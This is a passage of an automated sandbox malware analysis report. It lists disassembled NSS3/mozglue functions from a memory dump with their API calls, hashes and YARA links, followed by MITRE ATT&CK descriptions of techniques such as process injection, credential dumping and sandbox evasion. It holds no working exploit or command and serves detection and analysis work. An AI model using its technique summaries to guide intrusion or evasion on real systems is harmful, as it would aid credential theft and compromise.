PORT_ZAlloc_Util.NSS3(00000010), ref: 6C6F1D9C
free.MOZGLUE(00000000), ref: 6C6F1DB8

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Alloc_Util$Errorfree
String ID:
API String ID: 939066016-0
Opcode ID: f3a3a1cd596ab111cf568602922963181194d9de71c031e45cbdb28f0a2bb8d4
Instruction ID: e3ad41c92ffe303e932701ddc438fe99e39841864b06f4306a97446a3a09ec7a
Opcode Fuzzy Hash: f3a3a1cd596ab111cf568602922963181194d9de71c031e45cbdb28f0a2bb8d4
Instruction Fuzzy Hash: CFF049F260521057FB205E196C46B8732A99B817E8F100235DD2C87B40D731E40686F9

Function 6C73FD80 Relevance: 6.0, APIs: 4, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C6E9003,?), ref: 6C73FD91

Part of subcall function 6C740BE0: malloc.MOZGLUE(6C738D2D,?,00000000,?), ref: 6C740BF8
Part of subcall function 6C740BE0: TlsGetValue.KERNEL32(6C738D2D,?,00000000,?), ref: 6C740C15

PORT_Alloc_Util.NSS3(A4686C74,?), ref: 6C73FDA2
memcpy.VCRUNTIME140(00000000,12D068C3,A4686C74,?,?), ref: 6C73FDC4
free.MOZGLUE(00000000,?,?), ref: 6C73FDD1

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Alloc_Util$Valuefreemallocmemcpy
String ID:
API String ID: 2335489644-0
Opcode ID: 171ff87a08f773789d6bbd3ad00683224eff124f7e926d6e2050c227f20f0bd0
Instruction ID: a24c9147f37482acbc41af89dd126249d737bf965bbeb51f956c17f9d3be497e
Opcode Fuzzy Hash: 171ff87a08f773789d6bbd3ad00683224eff124f7e926d6e2050c227f20f0bd0
Instruction Fuzzy Hash: 46F04CF26012125BEB014F58DE998177758EF502D8B108075FD0C8BB03E721D814C3E1

Function 6C7FCC50 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(?), ref: 6C7FCC61
free.MOZGLUE ref: 6C7FCC6E
DeleteCriticalSection.KERNEL32(?), ref: 6C7FCC80
free.MOZGLUE(?), ref: 6C7FCC87

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: CriticalDeleteSectionfree
String ID:
API String ID: 2988086103-0
Opcode ID: ad8df642da710171fb87f9513a40ad39a41d1d331087eac071a75598ba26f723
Instruction ID: c2e1b50276e5cff0a8ba4a40496ac8c6f898684573aaa9117bc01f087383c601
Opcode Fuzzy Hash: ad8df642da710171fb87f9513a40ad39a41d1d331087eac071a75598ba26f723
Instruction Fuzzy Hash: EDE030B6700618ABCA20EFA9DC4488677ACEE492743150A35E695C3701D231F905CBE1

Function 6C6D9DC0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 220COMMON

Download Yara Rule

APIs

sqlite3_value_text.NSS3 ref: 6C6D9E1F

Part of subcall function 6C6913C0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,6C662352,?,00000000,?,?), ref: 6C691413
Part of subcall function 6C6913C0: memcpy.VCRUNTIME140(00000000,R#fl,00000002,?,?,?,?,6C662352,?,00000000,?,?), ref: 6C6914C0

Strings

ESCAPE expression must be a single character, xrefs: 6C6D9F78
LIKE or GLOB pattern too complex, xrefs: 6C6DA006

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: memcpysqlite3_value_textstrlen
String ID: ESCAPE expression must be a single character$LIKE or GLOB pattern too complex
API String ID: 2453365862-264706735
Opcode ID: 6eb9e6a6071ec47475b81057aa3156aedc738f275b5026d85118ab582f4150ef
Instruction ID: baec7d16093fce9a16000abc06cc98c17f0929d1db999b49db55f2476e187d5a
Opcode Fuzzy Hash: 6eb9e6a6071ec47475b81057aa3156aedc738f275b5026d85118ab582f4150ef
Instruction Fuzzy Hash: C181EA71A042564BD700CF25C0A03EEB7F2AF4531CF2A8659D8A89BB81DB35F846C795

Function 6C734D10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6C734D57
PR_snprintf.NSS3(?,00000008,%d.%d,?,?), ref: 6C734DE6

Strings

%d.%d, xrefs: 6C734DDE

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: ErrorR_snprintf
String ID: %d.%d
API String ID: 2298970422-3954714993
Opcode ID: be53e8ce9db8cd1a734fac52e6322a7ae80b8bc1b31b6d9df7e4c33a44c3b058
Instruction ID: 4cbfc1bf559b704421d5a96b4c991cc7a74d918265d69d7bce0b39711bc59669
Opcode Fuzzy Hash: be53e8ce9db8cd1a734fac52e6322a7ae80b8bc1b31b6d9df7e4c33a44c3b058
Instruction Fuzzy Hash: 36310EB2D042296BEB145B619D06BFF7B68DF40308F050429ED1997782EB319909C7E1

Function 6C754CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3('8ul,00000000,00000000,?,?,6C753827,?,00000000), ref: 6C754D0A

Part of subcall function 6C740840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7408B4

SECITEM_ItemsAreEqual_Util.NSS3(00000000,00000000,00000000), ref: 6C754D22

Part of subcall function 6C73FD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6C6E1A3E,00000048,00000054), ref: 6C73FD56

Strings

'8ul, xrefs: 6C754D07

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Util$Equal_ErrorFindItemsTag_memcmp
String ID: '8ul
API String ID: 1521942269-546659443
Opcode ID: 14028aa1c084b1134f31e0fe545c68cf4cce508ec734b29011f619df16d7203e
Instruction ID: e3703bb7bd39fa14e4aa04f12eb1c106f72c81bb23d9b6b5683d9d2fc599e12d
Opcode Fuzzy Hash: 14028aa1c084b1134f31e0fe545c68cf4cce508ec734b29011f619df16d7203e
Instruction Fuzzy Hash: FAF09C32A0132457DB104F6AAE4574336DC9B4167DF5402B1DE18CB791EA71CC30D6D1

Function 6C77AF70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

PR_GetUniqueIdentity.NSS3(SSL), ref: 6C77AF78

Part of subcall function 6C6DACC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6DACE2
Part of subcall function 6C6DACC0: malloc.MOZGLUE(00000001), ref: 6C6DACEC
Part of subcall function 6C6DACC0: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C6DAD02
Part of subcall function 6C6DACC0: TlsGetValue.KERNEL32 ref: 6C6DAD3C
Part of subcall function 6C6DACC0: calloc.MOZGLUE(00000001,?), ref: 6C6DAD8C
Part of subcall function 6C6DACC0: PR_Unlock.NSS3 ref: 6C6DADC0
Part of subcall function 6C6DACC0: PR_Unlock.NSS3 ref: 6C6DAE8C
Part of subcall function 6C6DACC0: free.MOZGLUE(?), ref: 6C6DAEAB

memcpy.VCRUNTIME140(6C843084,6C8402AC,00000090), ref: 6C77AF94

Strings

SSL, xrefs: 6C77AF73

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Unlock$IdentityUniqueValuecallocfreemallocmemcpystrcpystrlen
String ID: SSL
API String ID: 2424436289-2135378647
Opcode ID: b0359fded3dd79490c8901648b65d32dfd446c52cf79a00f877a53cba68a9b89
Instruction ID: 3f15a324e7ee46e38bebdb7b24c2078b6a2e6304bab5dbf64ce442dc833582d3
Opcode Fuzzy Hash: b0359fded3dd79490c8901648b65d32dfd446c52cf79a00f877a53cba68a9b89
Instruction Fuzzy Hash: 80214AB2205B4C9ADF34FF51AA4B7527AB4B31624FF20D228C1280BB24D7316858DFE5

Function 6C6D0F00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

PR_GetPageSize.NSS3(6C6D0936,FFFFE8AE,?,6C6616B7,00000000,?,6C6D0936,00000000,?,6C66204A), ref: 6C6D0F1B

Part of subcall function 6C6D1370: GetSystemInfo.KERNEL32(?,?,?,?,6C6D0936,?,6C6D0F20,6C6D0936,FFFFE8AE,?,6C6616B7,00000000,?,6C6D0936,00000000), ref: 6C6D138F

PR_NewLogModule.NSS3(clock,6C6D0936,FFFFE8AE,?,6C6616B7,00000000,?,6C6D0936,00000000,?,6C66204A), ref: 6C6D0F25

Part of subcall function 6C6D1110: calloc.MOZGLUE(00000001,0000000C,?,?,?,?,?,?,?,?,?,?,6C6D0936,00000001,00000040), ref: 6C6D1130
Part of subcall function 6C6D1110: strdup.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,6C6D0936,00000001,00000040), ref: 6C6D1142
Part of subcall function 6C6D1110: PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES,?,?,?,?,?,?,?,?,?,?,?,?,?,6C6D0936,00000001), ref: 6C6D1167

Strings

clock, xrefs: 6C6D0F20

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: InfoModulePageSecureSizeSystemcallocstrdup
String ID: clock
API String ID: 536403800-3195780754
Opcode ID: 0c6a42896dbe4640fe9b7a783c2324dba6b43a4383a189965ae9577216e57a7c
Instruction ID: ef9b86340bb3ece8cd95556fed257913fee2f1b1670f9db57631c70607be6842
Opcode Fuzzy Hash: 0c6a42896dbe4640fe9b7a783c2324dba6b43a4383a189965ae9577216e57a7c
Instruction Fuzzy Hash: 10D0123160814455C53176979C45B96B7ECC7C327EF128836E10881E104AA8B0DAD2ED

Function 6C740DB0 Relevance: 5.1, APIs: 4, Instructions: 97COMMON

Download Yara Rule

APIs

calloc.MOZGLUE ref: 6C740DF5
TlsGetValue.KERNEL32 ref: 6C740E2D
TlsGetValue.KERNEL32 ref: 6C740E58
TlsGetValue.KERNEL32 ref: 6C740E84

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Value$calloc
String ID:
API String ID: 3339632435-0
Opcode ID: 5d40d3ea5bc252c4cf017c1ba87735d1f9cc4e1d0831edf75dbc4b73beddcf67
Instruction ID: 2c25e24dfbcf0db980493a4a38211655fc7ec6d6dcc47404b4c40c370f1392f2
Opcode Fuzzy Hash: 5d40d3ea5bc252c4cf017c1ba87735d1f9cc4e1d0831edf75dbc4b73beddcf67
Instruction Fuzzy Hash: 1731D4B06443A18BDB207F78C684A597BB8BF5630CF12C67DD8988BA11DB34D4A5CB85

Function 6C740F10 Relevance: 5.1, APIs: 4, Instructions: 52stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C6E2AF5,?,?,?,?,?,6C6E0A1B,00000000), ref: 6C740F1A
malloc.MOZGLUE(00000001), ref: 6C740F30
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C740F42
TlsGetValue.KERNEL32 ref: 6C740F5B

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Valuemallocmemcpystrlen
String ID:
API String ID: 2332725481-0
Opcode ID: 4d34a93e8ac7d766ac46bfd9933be772da86319a726d6e8033a3bd1e172b50ef
Instruction ID: ea49a8c0e47930869b51a791842b5ca0f1303028c4c537095fb148120259c7cb
Opcode Fuzzy Hash: 4d34a93e8ac7d766ac46bfd9933be772da86319a726d6e8033a3bd1e172b50ef
Instruction Fuzzy Hash: C001DDB1A5025457E72027399F489567AACEF6225DB014631EC1CC7A21E730D855C5E2

Function 6C6F1EB0 Relevance: 5.0, APIs: 4, Instructions: 38COMMON

Download Yara Rule

APIs

free.MOZGLUE(?), ref: 6C6F1ECE
free.MOZGLUE(?), ref: 6C6F1EDF
free.MOZGLUE(?), ref: 6C6F1EEF
free.MOZGLUE(?), ref: 6C6F1EF5

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 41c65a45e116aba544b7075303f49573e90de0f44317edf2d82c54e239f8965a
Instruction ID: 5f6126da51c35823d95112ef4912ba77df75cffb6f6c9347b3051c69e75b9da1
Opcode Fuzzy Hash: 41c65a45e116aba544b7075303f49573e90de0f44317edf2d82c54e239f8965a
Instruction Fuzzy Hash: C1F0B4F17001056BEB109B65DC45D6773ACEF452D8B040434EC2DC3A00D725F412D7E5

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process: OS API Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	Drive: Drive Modification, File: File Modification, Firmware: Firmware Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

